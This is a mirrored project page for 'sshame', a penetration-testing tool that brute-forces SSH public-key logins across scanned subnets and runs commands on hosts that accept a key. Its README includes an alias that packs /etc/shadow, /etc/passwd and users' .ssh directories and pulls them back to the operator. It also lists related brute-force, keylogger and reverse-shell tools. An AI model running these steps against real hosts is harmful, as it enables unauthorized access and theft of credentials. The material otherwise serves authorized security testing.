GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → HynekPetrak → sshame

HynekPetrak / sshame

Licence: MIT license
brute force SSH public-key authentication

Programming Languages

python
139335 projects - #7 most used programming language

Labels

sshauthenticationpenetration-testingbrute-force-attacksbrute-forcessh-keyethical-hackingremote-admin-tool

Projects that are alternatives of or similar to sshame

Thc Hydra
hydra
Stars: ✭ 5,645 (+13027.91%)
Mutual labels:  penetration-testing, brute-force-attacks, brute-force
brutekrag
Penetration tests on SSH servers using brute force or dictionary attacks. Written in Python.
Stars: ✭ 30 (-30.23%)
Mutual labels:  penetration-testing, brute-force, ethical-hacking
WPCracker
WordPress pentest tool
Stars: ✭ 34 (-20.93%)
Mutual labels:  penetration-testing, brute-force-attacks, brute-force
Brutegram
Instagram multi-bruteforce Platfrom
Stars: ✭ 183 (+325.58%)
Mutual labels:  brute-force-attacks, brute-force
Tactical Exploitation
Modern tactical exploitation toolkit.
Stars: ✭ 585 (+1260.47%)
Mutual labels:  penetration-testing, brute-force
H4cker
This repository is primarily maintained by Omar Santos and includes thousands of resources related to ethical hacking / penetration testing, digital forensics and incident response (DFIR), vulnerability research, exploit development, reverse engineering, and more.
Stars: ✭ 10,451 (+24204.65%)
Mutual labels:  penetration-testing, ethical-hacking
hackipy
Hacking, pen-testing, and cyber-security related tools built with Python.
Stars: ✭ 26 (-39.53%)
Mutual labels:  penetration-testing, ethical-hacking
phpmyadmin-authentication-bruteforce
phpMyAdmin Authentication Bruteforce Tool
Stars: ✭ 58 (+34.88%)
Mutual labels:  brute-force-attacks, brute-force
Minimalistic Offensive Security Tools
A repository of tools for pentesting of restricted and isolated environments.
Stars: ✭ 135 (+213.95%)
Mutual labels:  penetration-testing, brute-force
wifi-penetration-testing-cheat-sheet
Work in progress...
Stars: ✭ 149 (+246.51%)
Mutual labels:  penetration-testing, ethical-hacking
password-list
Password lists with top passwords to optimize bruteforce attacks
Stars: ✭ 174 (+304.65%)
Mutual labels:  brute-force-attacks, brute-force
DevBrute-A Password Brute Forcer
DevBrute is a Password Brute Forcer, It can Brute Force almost all Social Media Accounts or Any Web Application.
Stars: ✭ 91 (+111.63%)
Mutual labels:  penetration-testing, brute-force
Brute-Force-Login
Proof -Of-Concept Brute Force Login on a web-site with a good dictionary of words
Stars: ✭ 231 (+437.21%)
Mutual labels:  brute-force-attacks, brute-force
Stegcracker
Steganography brute-force utility to uncover hidden data inside files
Stars: ✭ 396 (+820.93%)
Mutual labels:  penetration-testing, brute-force
Oscp Automation
A collection of personal scripts used in hacking excercises.
Stars: ✭ 118 (+174.42%)
Mutual labels:  penetration-testing, brute-force
Webspoilt
This script will you help to find the information about the website and to help in penetrating testing
Stars: ✭ 34 (-20.93%)
Mutual labels:  penetration-testing, ethical-hacking
SSH-PuTTY-login-bruteforcer
Turn PuTTY into an SSH login bruteforcing tool.
Stars: ✭ 222 (+416.28%)
Mutual labels:  penetration-testing, brute-force
argus
Argus Advanced Remote & Local Keylogger For macOS and Windows
Stars: ✭ 87 (+102.33%)
Mutual labels:  penetration-testing, ethical-hacking
reverse-ssh
Statically-linked ssh server with reverse shell functionality for CTFs and such
Stars: ✭ 548 (+1174.42%)
Mutual labels:  penetration-testing, remote-admin-tool
GmailBruterV2
Simple tool written in python3 to perform limited brute-force attacks on gmail accounts.
Stars: ✭ 264 (+513.95%)
Mutual labels:  brute-force-attacks, brute-force
View All Similar Projects ➔

sshame logo

sshame - brute force SSH public-key authentication

Interactive tool to brute force ssh public key authentication. Primarily intended for pentration testers. Sshame can execute commands on remote hosts.

Installing

Installing from Github

Clone the source from Github:

git clone https://github.com/HynekPetrak/sshame.git
cd sshame

Then in order to install run:

sudo python3 setup.py install

In case you want to contribute instead of install run:

sudo python3 setup.py develop

Installaling via PyPI

pip3 will install the latest release.

pip3 install sshame

Basic usage

sshame is interactive, based on https://github.com/python-cmd2/cmd2

# sshame
(sshame)

Type help to get a list of commands:

(sshame) help

Documented commands (type help <topic>):

Sshame
======
commands  creds  exploit  hosts  keys  resolve  session

Uncategorized
=============
alias  help     macro     py    record        run_script  shell
edit   history  playback  quit  run_pyscript  set         shortcuts

Add target hosts

In the sshame shell run hosts -a list-of-ip-ranges-or-hosts [-p port]:

(sshame) hosts -a 10.0.0.0/24 -p 22
Scanning 10.0.0.0/24 on port(s) 22
........***.............
Received 877 packets, got 222 answers, remaining 34 packets
2019-08-25 19:22:15,633 sshame [I] 'Adding host (port open): 10.0.0.2 22'
2019-08-25 19:22:15,683 sshame [I] 'Adding host (port open): 10.0.0.1 22'
2019-08-25 19:22:15,686 sshame [I] 'Adding host (port open): 10.0.0.6 22'

sshame will scan the given hosts with scapy and add those, which have the port open.

To verify added hosts with TCP port open run hosts -l

Load ssh keys

Load private keys with keys -a glob_path [-p list-of-passwords]

(sshame) keys -a test/**/*key
2019-08-25 19:30:40,613 sshame [I] "Adding ssh keys from: ['test/**/*key']"
2019-08-25 19:30:40,614 sshame [I] "Discovered 4 files in 'test/**/*key'."
2019-08-25 19:30:40,615 sshame [I] 'Going to examine 4 files.'
2019-08-25 19:30:40,635 sshame [I] 'Importing ssh-dss key: test/keys/dsa_key'
2019-08-25 19:30:40,645 sshame [I] 'Importing ssh-rsa key: test/keys/rsa_key'
2019-08-25 19:30:40,680 sshame [I] 'Importing ecdsa-sha2-nistp256 key: test/keys/ecdsa_key'
2019-08-25 19:30:40,693 sshame [I] 'Importing ssh-ed25519 key: test/keys/ed25519_key'
Loaded 4 unique keys, ignoring 0 duplicates

-p list-of-passwords is optional in case you load encrypted private keys protected with passwords.

List loaded keys with keys -l

Test keys on hosts

To brute force which keys authenticates on which target run test_keys -u list-of-users:

(sshame) test_keys -u root admin
2019-08-25 19:34:31,900 sshame [I] 'Preparing target jobs...'
2019-08-25 19:34:31,933 sshame [I] 'Matching keys - 16 jobs scheduled'
Completed: [####################] [100.00%]
2019-08-25 19:34:56,857 sshame [I] '---------------------------------------------------------------------------'

List matching keys with creds -l:

(sshame) creds -l
[1/1/1]: ssh -i test/keys/rsa_key [email protected]
[2/2/1]: ssh -i test/keys/dsa_key [email protected]

Run commands on remote hosts

To run commands on remote hosts use run_cmd -c command, e.g.:

(sshame) run_cmd -c whoami
2019-08-25 23:28:22,757 sshame [I] 'Preparing target jobs...'
2019-08-25 23:28:22,763 sshame [I] 'Executing commands - 2 jobs scheduled'
Completed: [####################] [100.00%]
2019-08-25 23:28:23,993 sshame [I] '---------------------------------------------------------------------------'

Show command results

With commands -r diplay the results:

(sshame) commands -r
Entries: 2

| guid                                 | host_address   |   host_port | username   | cmd                  |   exit_status | output          | updated             |
|--------------------------------------+----------------+-------------+------------+----------------------+---------------+-----------------+---------------------|
| 434f163a-24b5-4775-a3c1-6ea41745b18d | 10.0.0.2       |          22 | root       | whoami               |             0 | root            | 2019-08-25 21:28:23 |
| 305e3f5d-bf4d-4024-981a-59b2dddebbcd | 10.0.0.1       |          22 | admin      | whoami               |             0 | admin           | 2019-08-25 21:28:23 |

Pipe remote commands to a local shell

Define an alias get_files for a remote command tar -cf - /etc/passwd /etc/ldap.conf /etc/shadow /home/*/.ssh /etc/fstab | gzip | uuencode /dev/stdout; exit 0 and pipe it to a local uudecode -o - |tar xzf -, with:

commands -a get_files "tar -cf -  /etc/passwd /etc/ldap.conf /etc/shadow /home/*/.ssh /etc/fstab | gzip | uuencode /dev/stdout; exit 0" -p "uudecode -o - |tar xzf -"

exit 0 is to override tar's exit code in case of missing files.

Run te defined command with:

run_cmd -c get_files

The output you will find in the folder output/<host>_<port>/username/...

Session management

You may want to split wokloads into sessions. Use session name to switch between sessions. Default session is called 'default'.

Each session has its data stored in a separate sqlite db in the current directory named after the session name, e.g. default.db

(sshame) session test
2019-08-25 23:38:38,283 sshame [I] 'Openning session: sqlite:///test.db'

License

MIT

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].